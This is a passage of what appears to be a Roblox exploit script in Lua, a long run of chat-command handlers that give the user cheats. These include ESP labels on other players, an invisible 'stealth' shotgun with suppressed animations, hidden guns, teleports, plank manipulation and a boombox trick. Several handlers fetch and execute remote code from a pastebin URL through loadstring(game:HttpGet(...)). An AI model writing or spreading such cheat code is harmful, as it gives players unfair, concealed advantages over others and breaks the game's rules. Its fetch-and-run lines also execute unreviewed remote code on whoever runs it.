  1655. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1656. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1657. v.Parent = game.Workspace.Terrain
  1658. end
  1659. end
  1660. wait()
  1661. for i = 1,3 do
  1662. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,3)
  1663. wait(0.1)
  1664. end
  1665. bringboomsback = true
  1666. if game.Players.LocalPlayer.Character ~= nil then
  1667. game.Players.LocalPlayer.Character:BreakJoints()
  1668. end
  1669. repeat wait() until continueunmutable == true
  1670. continueunmutable = false
  1671. wait()
  1672. for i,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1673. if v:IsA("Tool") and v.Name == "BoomBox" and i == 2 then
  1674. v.Parent = game.Players.LocalPlayer.Character
  1675. repeat wait() until game.Players.LocalPlayer.Backpack:FindFirstChild("BoomBox")
  1676. end
  1677. end
  1678. wait(0.4)
  1679. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1680. if v:IsA("Tool") and v.Name == "BoomBox" and v:FindFirstChild("Remote") then
  1681. v.Remote:FireServer("PlaySong", "3456969984")
  1682. wait(1.411)
  1683. v.Parent = game.Players.LocalPlayer.Backpack
  1684. end
  1685. end
  1686. game.StarterGui:SetCore("SendNotification", {
  1687. Title = "Done!";
  1688. Text = "Your boombox is unmutable now";
  1689. Icon = "rbxassetid://847562022";
  1690. Duration = 5;
  1691. })
  1692. end
  1693.  
  1694. if lower == "/e :unmutable" then
  1695. for _,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1696. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1697. v.Parent = game.Players.LocalPlayer.Character
  1698. end
  1699. end
  1700. wait()
  1701. for _,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1702. if (v:IsA("Tool") and v.Name == "BoomBox") then
  1703. v.Parent = game.Workspace.Terrain
  1704. end
  1705. end
  1706. wait()
  1707. for i = 1,3 do
  1708. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,3)
  1709. wait(0.1)
  1710. end
  1711. bringboomsback = true
  1712. if game.Players.LocalPlayer.Character ~= nil then
  1713. game.Players.LocalPlayer.Character:BreakJoints()
  1714. end
  1715. repeat wait() until continueunmutable == true
  1716. continueunmutable = false
  1717. wait(0.4)
  1718. for i,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  1719. if v:IsA("Tool") and v.Name == "BoomBox" and i == 2 then
  1720. v.Parent = game.Players.LocalPlayer.Character
  1721. repeat wait() until game.Players.LocalPlayer.Backpack:FindFirstChild("BoomBox")
  1722. end
  1723. end
  1724.  
  1725. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  1726. if v:IsA("Tool") and v.Name == "BoomBox" and v:FindFirstChild("Remote") then
  1727. v.Remote:FireServer("PlaySong", "3456969984")
  1728. wait(1.411)
  1729. v.Parent = game.Players.LocalPlayer.Backpack
  1730. end
  1731. end
  1732. game.StarterGui:SetCore("SendNotification", {
  1733. Title = "Done!";
  1734. Text = "Your boombox is unmutable now";
  1735. Icon = "rbxassetid://847562022";
  1736. Duration = 5;
  1737. })
  1738. end
  1739.  
  1740.  
  1741.  
  1742. if string.find(lower,":deseat") then
  1743. deseat(game.Workspace)
  1744. end
  1745. if string.find(lower,"/e deseat") then
  1746. deseat(game.Workspace)
  1747. end
  1748. if string.find(lower,"/e :deseat") then
  1749. deseat(game.Workspace)
  1750. end
  1751.  
  1752.  
  1753. if string.find(lower,":reseat") then
  1754. reseat(game.Lighting)
  1755. end
  1756.  
  1757. if string.find(lower,"/e reseat") then
  1758. reseat(game.Lighting)
  1759. end
  1760.  
  1761. if string.find(lower,"/e :reseat") then
  1762. reseat(game.Lighting)
  1763. end
  1764.  
  1765.  
  1766.  
  1767. if string.find(lower,":defence") then
  1768. defence(game.Workspace)
  1769. end
  1770. if string.find(lower,"/e defence") then
  1771. defence(game.Workspace)
  1772. end
  1773. if string.find(lower,"/e :defence") then
  1774. defence(game.Workspace)
  1775. end
  1776.  
  1777. if string.find(lower,":refence") then
  1778. refence(game.Lighting)
  1779. end
  1780. if string.find(lower,"/e refence") then
  1781. refence(game.Lighting)
  1782. end
  1783. if string.find(lower,"/e :refence") then
  1784. refence(game.Lighting)
  1785. end
  1786.  
  1787.  
  1788.  
  1789. if string.find(lower,":cash") then
  1790. tracecash(game.Workspace)
  1791. end
  1792.  
  1793. if string.find(lower,"/e cash") then
  1794. tracecash(game.Workspace)
  1795. end
  1796.  
  1797. if string.find(lower,"/e :cash") then
  1798. tracecash(game.Workspace)
  1799. end
  1800.  
  1801.  
  1802.  
  1803. if string.find(lower,":togglewirerun") then
  1804. if wirerunning == true then
  1805. unwirerun(game.Workspace)
  1806. wirerunning = false
  1807. elseif wirerunning == false then
  1808. wirerun(game.Workspace)
  1809. wirerunning = true
  1810. end
  1811. end
  1812.  
  1813.  
  1814.  
  1815. if string.find(lower,":jumpshoot") then
  1816. jumpshoot = true
  1817. end
  1818.  
  1819. if string.find(lower,"/e jumpshoot") then
  1820. jumpshoot = true
  1821. end
  1822.  
  1823. if string.find(lower,"/e :jumpshoot") then
  1824. jumpshoot = true
  1825. end
  1826.  
  1827.  
  1828.  
  1829. if string.find(lower,":unjumpshoot") then
  1830. jumpshoot = false
  1831. end
  1832. if string.find(lower,"/e unjumpshoot") then
  1833. jumpshoot = false
  1834. end
  1835. if string.find(lower,"/e :unjumpshoot") then
  1836. jumpshoot = false
  1837. end
  1838.  
  1839.  
  1840.  
  1841. if string.find(lower,":walkshoot") then
  1842. walkshoot = true
  1843. end
  1844.  
  1845. if string.find(lower,"/e walkshoot") then
  1846. walkshoot = true
  1847. end
  1848.  
  1849. if string.find(lower,"/e :walkshoot") then
  1850. walkshoot = true
  1851. end
  1852.  
  1853. if string.find(lower,":unwalkshoot") then
  1854. walkshoot = false
  1855. end
  1856.  
  1857. if string.find(lower,"/e unwalkshoot") then
  1858. walkshoot = false
  1859. end
  1860.  
  1861. if string.find(lower,"/e :unwalkshoot") then
  1862. walkshoot = false
  1863. end
  1864.  
  1865.  
  1866.  
  1867.  
  1868.  
  1869. if string.find(lower,":find ") then
  1870. local playername = string.gsub(lower,":find ","")
  1871. if string.lower(playername) == "target" then
  1872. if targetee then
  1873. if targetee.Character then
  1874.  
  1875. local billgui = Instance.new('BillboardGui', targetee.Character.Head)
  1876. local textlab = Instance.new('TextLabel', billgui)
  1877.  
  1878. billgui.Name = "ESP"
  1879. billgui.Adornee = epic
  1880. billgui.AlwaysOnTop = true
  1881. billgui.ExtentsOffset = Vector3.new(0, 3, 0)
  1882. billgui.Size = UDim2.new(0, 5, 0, 5)
  1883.  
  1884. textlab.Name = 'Target'
  1885. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  1886. textlab.BackgroundTransparency = 1
  1887. textlab.BorderSizePixel = 0
  1888. textlab.Position = UDim2.new(0, 0, 0, -40)
  1889. textlab.Size = UDim2.new(1, 0, 10, 0)
  1890. textlab.Visible = true
  1891. textlab.ZIndex = 10
  1892. textlab.Font = 'ArialBold'
  1893. textlab.FontSize = 'Size18'
  1894. textlab.Text = targetee.Name
  1895. textlab.TextColor = BrickColor.new('Bright blue')
  1896. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  1897. textlab.TextStrokeTransparency = 0.6
  1898. end
  1899. end
  1900.  
  1901. else
  1902. local player = findplayer(playername)
  1903. if player ~= false then
  1904. if player.Character then
  1905.  
  1906. local billgui = Instance.new('BillboardGui', player.Character.Head)
  1907. local textlab = Instance.new('TextLabel', billgui)
  1908.  
  1909. billgui.Name = "ESP"
  1910. billgui.Adornee = epic
  1911. billgui.AlwaysOnTop = true
  1912. billgui.ExtentsOffset = Vector3.new(0, 3, 0)
  1913. billgui.Size = UDim2.new(0, 5, 0, 5)
  1914.  
  1915. textlab.Name = 'Player'
  1916. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  1917. textlab.BackgroundTransparency = 1
  1918. textlab.BorderSizePixel = 0
  1919. textlab.Position = UDim2.new(0, 0, 0, -40)
  1920. textlab.Size = UDim2.new(1, 0, 10, 0)
  1921. textlab.Visible = true
  1922. textlab.ZIndex = 10
  1923. textlab.Font = 'ArialBold'
  1924. textlab.FontSize = 'Size18'
  1925. textlab.Text = player.Name
  1926. textlab.TextColor = BrickColor.new('Bright red')
  1927. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  1928. textlab.TextStrokeTransparency = 0.6
  1929. end
  1930. end
  1931. end
  1932. end
  1933.  
  1934.  
  1935.  
  1936. if string.find(lower,"/e find ") then
  1937. local playername = string.gsub(lower,"/e find ","")
  1938. if string.lower(playername) == "target" then
  1939. if targetee then
  1940. if targetee.Character then
  1941. local billgui = Instance.new('BillboardGui', targetee.Character.Head)
  1942. local textlab = Instance.new('TextLabel', billgui)
  1943.  
  1944. billgui.Name = "ESP"
  1945. billgui.Adornee = epic
  1946. billgui.AlwaysOnTop = true
  1947. billgui.ExtentsOffset = Vector3.new(0, 3, 0)
  1948. billgui.Size = UDim2.new(0, 5, 0, 5)
  1949.  
  1950. textlab.Name = 'Target'
  1951. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  1952. textlab.BackgroundTransparency = 1
  1953. textlab.BorderSizePixel = 0
  1954. textlab.Position = UDim2.new(0, 0, 0, -40)
  1955. textlab.Size = UDim2.new(1, 0, 10, 0)
  1956. textlab.Visible = true
  1957. textlab.ZIndex = 10
  1958. textlab.Font = 'ArialBold'
  1959. textlab.FontSize = 'Size18'
  1960. textlab.Text = targetee.Name
  1961. textlab.TextColor = BrickColor.new('Bright blue')
  1962. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  1963. textlab.TextStrokeTransparency = 0.6
  1964. end
  1965. end
  1966.  
  1967. else
  1968. local player = findplayer(playername)
  1969. if player ~= false then
  1970. if player.Character then
  1971.  
  1972. local billgui = Instance.new('BillboardGui', player.Character.Head)
  1973. local textlab = Instance.new('TextLabel', billgui)
  1974.  
  1975. billgui.Name = "ESP"
  1976. billgui.Adornee = epic
  1977. billgui.AlwaysOnTop = true
  1978. billgui.ExtentsOffset = Vector3.new(0, 3, 0)
  1979. billgui.Size = UDim2.new(0, 5, 0, 5)
  1980.  
  1981. textlab.Name = 'Player'
  1982. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  1983. textlab.BackgroundTransparency = 1
  1984. textlab.BorderSizePixel = 0
  1985. textlab.Position = UDim2.new(0, 0, 0, -40)
  1986. textlab.Size = UDim2.new(1, 0, 10, 0)
  1987. textlab.Visible = true
  1988. textlab.ZIndex = 10
  1989. textlab.Font = 'ArialBold'
  1990. textlab.FontSize = 'Size18'
  1991. textlab.Text = player.Name
  1992. textlab.TextColor = BrickColor.new('Bright red')
  1993. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  1994. textlab.TextStrokeTransparency = 0.6
  1995. end
  1996. end
  1997. end
  1998. end
  1999.  
  2000.  
  2001.  
  2002.  
  2003. if string.find(lower,"/e :find ") then
  2004. local playername = string.gsub(lower,"/e :find ","")
  2005. if string.lower(playername) == "target" then
  2006. if targetee then
  2007. if targetee.Character then
  2008.  
  2009. local billgui = Instance.new('BillboardGui', targetee.Character.Head)
  2010. local textlab = Instance.new('TextLabel', billgui)
  2011.  
  2012. billgui.Name = "ESP"
  2013. billgui.Adornee = epic
  2014. billgui.AlwaysOnTop = true
  2015. billgui.ExtentsOffset = Vector3.new(0, 3, 0)
  2016. billgui.Size = UDim2.new(0, 5, 0, 5)
  2017.  
  2018. textlab.Name = 'Target'
  2019. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  2020. textlab.BackgroundTransparency = 1
  2021. textlab.BorderSizePixel = 0
  2022. textlab.Position = UDim2.new(0, 0, 0, -40)
  2023. textlab.Size = UDim2.new(1, 0, 10, 0)
  2024. textlab.Visible = true
  2025. textlab.ZIndex = 10
  2026. textlab.Font = 'ArialBold'
  2027. textlab.FontSize = 'Size18'
  2028. textlab.Text = targetee.Name
  2029. textlab.TextColor = BrickColor.new('Bright blue')
  2030. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  2031. textlab.TextStrokeTransparency = 0.6
  2032. end
  2033. end
  2034.  
  2035. else
  2036. local player = findplayer(playername)
  2037. if player ~= false then
  2038. if player.Character then
  2039.  
  2040. local billgui = Instance.new('BillboardGui', player.Character.Head)
  2041. local textlab = Instance.new('TextLabel', billgui)
  2042.  
  2043. billgui.Name = "ESP"
  2044. billgui.Adornee = epic
  2045. billgui.AlwaysOnTop = true
  2046. billgui.ExtentsOffset = Vector3.new(0, 3, 0)
  2047. billgui.Size = UDim2.new(0, 5, 0, 5)
  2048.  
  2049. textlab.Name = 'Player'
  2050. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  2051. textlab.BackgroundTransparency = 1
  2052. textlab.BorderSizePixel = 0
  2053. textlab.Position = UDim2.new(0, 0, 0, -40)
  2054. textlab.Size = UDim2.new(1, 0, 10, 0)
  2055. textlab.Visible = true
  2056. textlab.ZIndex = 10
  2057. textlab.Font = 'ArialBold'
  2058. textlab.FontSize = 'Size18'
  2059. textlab.Text = player.Name
  2060. textlab.TextColor = BrickColor.new('Bright red')
  2061. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  2062. textlab.TextStrokeTransparency = 0.6
  2063. end
  2064. end
  2065. end
  2066. end
  2067.  
  2068. if string.find(lower,":unfind ") then
  2069. local playername = string.gsub(lower,":unfind ","")
  2070. local player = findplayer(playername)
  2071. if player ~= false then
  2072. if player.Character then
  2073. if player.Character:FindFirstChild("Head") then
  2074. if player.Character.Head:FindFirstChild("ESP") then
  2075. player.Character.Head:FindFirstChild("ESP"):Destroy()
  2076. end
  2077. end
  2078. end
  2079. end
  2080. end
  2081.  
  2082. if string.find(lower,"/e unfind ") then
  2083. local playername = string.gsub(lower,"/e unfind ","")
  2084. local player = findplayer(playername)
  2085. if player ~= false then
  2086. if player.Character then
  2087. if player.Character:FindFirstChild("Head") then
  2088. if player.Character.Head:FindFirstChild("ESP") then
  2089. player.Character.Head:FindFirstChild("ESP"):Destroy()
  2090. end
  2091. end
  2092. end
  2093. end
  2094. end
  2095.  
  2096. if string.find(lower,"/e :unfind ") then
  2097. local playername = string.gsub(lower,"/e :unfind ","")
  2098. local player = findplayer(playername)
  2099. if player ~= false then
  2100. if player.Character then
  2101. if player.Character:FindFirstChild("Head") then
  2102. if player.Character.Head:FindFirstChild("ESP") then
  2103. player.Character.Head:FindFirstChild("ESP"):Destroy()
  2104. end
  2105. end
  2106. end
  2107. end
  2108. end
  2109.  
  2110.  
  2111.  
  2112. if string.find(lower,":planks") then
  2113. plankfollow = true
  2114. planksurf = false
  2115. for i=1,#planks do
  2116. if planks[i]:FindFirstChild("no") then
  2117. planks[i]:FindFirstChild("no"):Destroy()
  2118. end
  2119. local keep = Instance.new("BodyPosition")
  2120. keep.Parent = planks[i]
  2121. keep.Name = "no"
  2122. keep.P = 100
  2123. keep.D = 50
  2124. keep.Position = game.Players.LocalPlayer.Character.Torso.Position - Vector3.new(0,0,10)
  2125. end
  2126. end
  2127.  
  2128. if string.find(lower,"/e planks") then
  2129. plankfollow = true
  2130. planksurf = false
  2131. for i=1,#planks do
  2132. if planks[i]:FindFirstChild("no") then
  2133. planks[i]:FindFirstChild("no"):Destroy()
  2134. end
  2135. local keep = Instance.new("BodyPosition")
  2136. keep.Parent = planks[i]
  2137. keep.Name = "no"
  2138. keep.P = 100
  2139. keep.D = 50
  2140. keep.Position = game.Players.LocalPlayer.Character.Torso.Position - Vector3.new(0,0,10)
  2141. end
  2142. end
  2143.  
  2144. if string.find(lower,"/e :planks") then
  2145. plankfollow = true
  2146. planksurf = false
  2147. for i=1,#planks do
  2148. if planks[i]:FindFirstChild("no") then
  2149. planks[i]:FindFirstChild("no"):Destroy()
  2150. end
  2151. local keep = Instance.new("BodyPosition")
  2152. keep.Parent = planks[i]
  2153. keep.Name = "no"
  2154. keep.P = 100
  2155. keep.D = 50
  2156. keep.Position = game.Players.LocalPlayer.Character.Torso.Position - Vector3.new(0,0,10)
  2157. end
  2158. end
  2159.  
  2160. if string.find(lower,":unplanks") then
  2161. plankfollow = false
  2162. planksurf = false
  2163. for i=1,#planks do
  2164. if planks[1]:FindFirstChild("no") then
  2165. planks[1]:FindFirstChild("no"):Destroy()
  2166. end
  2167. end
  2168. end
  2169.  
  2170. if string.find(lower,"/e unplanks") then
  2171. plankfollow = false
  2172. planksurf = false
  2173. for i=1,#planks do
  2174. if planks[1]:FindFirstChild("no") then
  2175. planks[1]:FindFirstChild("no"):Destroy()
  2176. end
  2177. end
  2178. end
  2179.  
  2180. if string.find(lower,"/e :unplanks") then
  2181. plankfollow = false
  2182. planksurf = false
  2183. for i=1,#planks do
  2184. if planks[1]:FindFirstChild("no") then
  2185. planks[1]:FindFirstChild("no"):Destroy()
  2186. end
  2187. end
  2188. end
  2189.  
  2190.  
  2191.  
  2192. if string.find(lower,":planksurf") then
  2193. plankfollow = false
  2194. planksurf = true
  2195. for i=1,#planks do
  2196. if planks[i]:FindFirstChild("no") then
  2197. planks[i]:FindFirstChild("no"):Destroy()
  2198. end
  2199. local keep = Instance.new("BodyPosition")
  2200. keep.Parent = planks[i]
  2201. keep.Name = "no"
  2202. keep.P = 5000
  2203. keep.D = 15
  2204. keep.Position = game.Players.LocalPlayer.Character.Torso.Position - Vector3.new(0,0,10)
  2205. end
  2206. end
  2207.  
  2208. if string.find(lower,"/e planksurf") then
  2209. plankfollow = false
  2210. planksurf = true
  2211. for i=1,#planks do
  2212. if planks[i]:FindFirstChild("no") then
  2213. planks[i]:FindFirstChild("no"):Destroy()
  2214. end
  2215. local keep = Instance.new("BodyPosition")
  2216. keep.Parent = planks[i]
  2217. keep.Name = "no"
  2218. keep.P = 5000
  2219. keep.D = 15
  2220. keep.Position = game.Players.LocalPlayer.Character.Torso.Position - Vector3.new(0,0,10)
  2221. end
  2222. end
  2223.  
  2224. if string.find(lower,"/e :planksurf") then
  2225. plankfollow = false
  2226. planksurf = true
  2227. for i=1,#planks do
  2228. if planks[i]:FindFirstChild("no") then
  2229. planks[i]:FindFirstChild("no"):Destroy()
  2230. end
  2231. local keep = Instance.new("BodyPosition")
  2232. keep.Parent = planks[i]
  2233. keep.Name = "no"
  2234. keep.P = 5000
  2235. keep.D = 15
  2236. keep.Position = game.Players.LocalPlayer.Character.Torso.Position - Vector3.new(0,0,10)
  2237. end
  2238. end
  2239.  
  2240.  
  2241. if string.sub(msg, 1, 10) == ":tostreets" then
  2242. TeleportService:Teleport(455366377, game.Players.LocalPlayer)
  2243. end
  2244. if string.sub(msg, 1, 12) == "/e tostreets" then
  2245. TeleportService:Teleport(455366377, game.Players.LocalPlayer)
  2246. end
  2247. if string.sub(msg, 1, 13) == "/e :tostreets" then
  2248. TeleportService:Teleport(455366377, game.Players.LocalPlayer)
  2249. end
  2250.  
  2251.  
  2252. if string.sub(msg, 1, 9) == ":toprison" then
  2253. TeleportService:Teleport(4669040, game.Players.LocalPlayer)
  2254. end
  2255. if string.sub(msg, 1, 11) == "/e toprison" then
  2256. TeleportService:Teleport(4669040, game.Players.LocalPlayer)
  2257. end
  2258. if string.sub(msg, 1, 12) == "/e :toprison" then
  2259. TeleportService:Teleport(4669040, game.Players.LocalPlayer)
  2260. end
  2261.  
  2262. if string.find(lower,":hidegun") then
  2263. if game.Players.LocalPlayer.Character then
  2264. if game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool") then
  2265. if game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool"):FindFirstChild("Fire") then
  2266. invis(game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool"))
  2267. end
  2268. end
  2269. end
  2270. end
  2271.  
  2272. if string.find(lower,"/e hidegun") then
  2273. if game.Players.LocalPlayer.Character then
  2274. if game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool") then
  2275. if game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool"):FindFirstChild("Fire") then
  2276. invis(game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool"))
  2277. end
  2278. end
  2279. end
  2280. end
  2281.  
  2282. if string.find(lower,"/e :hidegun") then
  2283. if game.Players.LocalPlayer.Character then
  2284. if game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool") then
  2285. if game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool"):FindFirstChild("Fire") then
  2286. invis(game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool"))
  2287. end
  2288. end
  2289. end
  2290. end
  2291.  
  2292.  
  2293. if string.find(lower,":rmesh") then
  2294. if game.Players.LocalPlayer.Character then
  2295. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  2296. if v:IsA("Tool") then
  2297. demesh(v)
  2298. end
  2299. end
  2300. end
  2301. end
  2302.  
  2303. if string.find(lower,"/e rmesh") then
  2304. if game.Players.LocalPlayer.Character then
  2305. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  2306. if v:IsA("Tool") then
  2307. demesh(v)
  2308. end
  2309. end
  2310. end
  2311. end
  2312.  
  2313. if string.find(lower,"/e :rmesh") then
  2314. if game.Players.LocalPlayer.Character then
  2315. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  2316. if v:IsA("Tool") then
  2317. demesh(v)
  2318. end
  2319. end
  2320. end
  2321. end
  2322.  
  2323. if string.find(lower,":demesh") then
  2324. if game.Players.LocalPlayer.Character then
  2325. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  2326. if v:IsA("Tool") then
  2327. demesh(v)
  2328. end
  2329. end
  2330. end
  2331. end
  2332.  
  2333. if string.find(lower,"/e demesh") then
  2334. if game.Players.LocalPlayer.Character then
  2335. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  2336. if v:IsA("Tool") then
  2337. demesh(v)
  2338. end
  2339. end
  2340. end
  2341. end
  2342.  
  2343. if string.find(lower,"/e :demesh") then
  2344. if game.Players.LocalPlayer.Character then
  2345. for i,v in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
  2346. if v:IsA("Tool") then
  2347. demesh(v)
  2348. end
  2349. end
  2350. end
  2351. end
  2352.  
  2353. if lower == ":rface" then
  2354. if game.Players.LocalPlayer.Character ~= nil then
  2355. if game.Players.LocalPlayer.Character:FindFirstChild("Head") then
  2356. if game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal") then
  2357. game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal").Parent = nil
  2358. end
  2359. end
  2360. end
  2361. end
  2362.  
  2363. if lower == "/e rface" then
  2364. if game.Players.LocalPlayer.Character ~= nil then
  2365. if game.Players.LocalPlayer.Character:FindFirstChild("Head") then
  2366. if game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal") then
  2367. game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal").Parent = nil
  2368. end
  2369. end
  2370. end
  2371. end
  2372.  
  2373. if lower == "/e :rface" then
  2374. if game.Players.LocalPlayer.Character ~= nil then
  2375. if game.Players.LocalPlayer.Character:FindFirstChild("Head") then
  2376. if game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal") then
  2377. game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal").Parent = nil
  2378. end
  2379. end
  2380. end
  2381. end
  2382.  
  2383.  
  2384.  
  2385. if lower == ":faceless" then
  2386. if game.Players.LocalPlayer.Character ~= nil then
  2387. if game.Players.LocalPlayer.Character:FindFirstChild("Head") then
  2388. if game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal") then
  2389. game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal").Parent = nil
  2390. end
  2391. end
  2392. end
  2393. end
  2394.  
  2395.  
  2396. if lower == "/e faceless" then
  2397. if game.Players.LocalPlayer.Character ~= nil then
  2398. if game.Players.LocalPlayer.Character:FindFirstChild("Head") then
  2399. if game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal") then
  2400. game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal").Parent = nil
  2401. end
  2402. end
  2403. end
  2404. end
  2405.  
  2406.  
  2407.  
  2408. if lower == "/e :faceless" then
  2409. if game.Players.LocalPlayer.Character ~= nil then
  2410. if game.Players.LocalPlayer.Character:FindFirstChild("Head") then
  2411. if game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal") then
  2412. game.Players.LocalPlayer.Character.Head:FindFirstChildOfClass("Decal").Parent = nil
  2413. end
  2414. end
  2415. end
  2416. end
  2417.  
  2418.  
  2419. if lower == ":rlegs" then
  2420. if game.Players.LocalPlayer.Character ~= nil then
  2421. if game.Players.LocalPlayer.Character:FindFirstChild("Left Leg") and game.Players.LocalPlayer.Character:FindFirstChild("Right Leg") then
  2422. game.Players.LocalPlayer.Character:FindFirstChild("Left Leg").Parent = nil
  2423. game.Players.LocalPlayer.Character:FindFirstChild("Right Leg").Parent = nil
  2424. end
  2425. end
  2426. end
  2427.  
  2428. if lower == "/e rlegs" then
  2429. if game.Players.LocalPlayer.Character ~= nil then
  2430. if game.Players.LocalPlayer.Character:FindFirstChild("Left Leg") and game.Players.LocalPlayer.Character:FindFirstChild("Right Leg") then
  2431. game.Players.LocalPlayer.Character:FindFirstChild("Left Leg").Parent = nil
  2432. game.Players.LocalPlayer.Character:FindFirstChild("Right Leg").Parent = nil
  2433. end
  2434. end
  2435. end
  2436.  
  2437. if lower == "/e :rlegs" then
  2438. if game.Players.LocalPlayer.Character ~= nil then
  2439. if game.Players.LocalPlayer.Character:FindFirstChild("Left Leg") and game.Players.LocalPlayer.Character:FindFirstChild("Right Leg") then
  2440. game.Players.LocalPlayer.Character:FindFirstChild("Left Leg").Parent = nil
  2441. game.Players.LocalPlayer.Character:FindFirstChild("Right Leg").Parent = nil
  2442. end
  2443. end
  2444. end
  2445.  
  2446.  
  2447. if lower == ":eboombox" then
  2448. if enhancedboombox == false then
  2449. enhancedboombox = true
  2450. loadstring(game:HttpGet(('https://pastebin.com/raw/BNVEDnAh'),true))() -- lol
  2451. else
  2452. print("Enhanced boombox already injected!")
  2453. end
  2454. end
  2455.  
  2456. if lower == "/e eboombox" then
  2457. if enhancedboombox == false then
  2458. enhancedboombox = true
  2459. loadstring(game:HttpGet(('https://pastebin.com/raw/BNVEDnAh'),true))() -- lol
  2460. else
  2461. print("Enhanced boombox already injected!")
  2462. end
  2463. end
  2464.  
  2465.  
  2466. if lower == "/e :eboombox" then
  2467. if enhancedboombox == false then
  2468. enhancedboombox = true
  2469. loadstring(game:HttpGet(('https://pastebin.com/raw/BNVEDnAh'),true))() -- lol
  2470. else
  2471. print("Enhanced boombox already injected!")
  2472. end
  2473. end
  2474.  
  2475.  
  2476.  
  2477.  
  2478. if lower == ":stealthshotty" then
  2479.  
  2480. if game.Players.LocalPlayer.Backpack:FindFirstChild("Shotty") then
  2481. game.Players.LocalPlayer.Backpack:FindFirstChild("Shotty").Parent = game.Players.LocalPlayer.Character
  2482. end
  2483. wait(0.1)
  2484. invis(game.Players.LocalPlayer.Character.Shotty)
  2485. game.Players.LocalPlayer.Character.Shotty.Grip = CFrame.new(-0.2,0,-3)
  2486.  
  2487.  
  2488. game.Players.LocalPlayer.Character.Shotty.Equipped:Connect(function()
  2489. wait()
  2490. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2491. for i, track in pairs (AnimationTracks) do
  2492. if track.Name == "Idle" then
  2493. track:Stop()
  2494. end
  2495. end
  2496. wait(0.7)
  2497. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2498. for i, track in pairs (AnimationTracks) do
  2499. if track.Name == "Idle" or string.find(track.Name, "Animation") then
  2500. track:Stop()
  2501. end
  2502. end
  2503. end)
  2504. game.Players.LocalPlayer.Character.Shotty.Activated:Connect(function()
  2505. wait()
  2506. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2507. for i, track in pairs (AnimationTracks) do
  2508. if track.Name == "Fires" then
  2509. track:Stop()
  2510. end
  2511. end
  2512. end)
  2513.  
  2514. wait(1.5)
  2515. if game.Players.LocalPlayer.Character:FindFirstChild("Shotty") then
  2516. game.Players.LocalPlayer.Character.Shotty.Parent = game.Players.LocalPlayer.Backpack
  2517. end
  2518.  
  2519.  
  2520. end
  2521.  
  2522. if lower == "/e stealthshotty" then
  2523.  
  2524. if game.Players.LocalPlayer.Backpack:FindFirstChild("Shotty") then
  2525. game.Players.LocalPlayer.Backpack:FindFirstChild("Shotty").Parent = game.Players.LocalPlayer.Character
  2526. end
  2527. wait(0.1)
  2528. invis(game.Players.LocalPlayer.Character.Shotty)
  2529. game.Players.LocalPlayer.Character.Shotty.Grip = CFrame.new(-0.2,0,-3)
  2530.  
  2531.  
  2532. game.Players.LocalPlayer.Character.Shotty.Equipped:Connect(function()
  2533. wait()
  2534. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2535. for i, track in pairs (AnimationTracks) do
  2536. if track.Name == "Idle" then
  2537. track:Stop()
  2538. end
  2539. end
  2540. wait(0.7)
  2541. local AnimationTracks = game.Players.LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()
  2542. for i, track in pairs (AnimationTracks) do
  2543. if track.Name == "Idle" or string.find(track.Name, "Animation") then
  2544. track:Stop()
  2545. end
  2546. end
  2547. end)
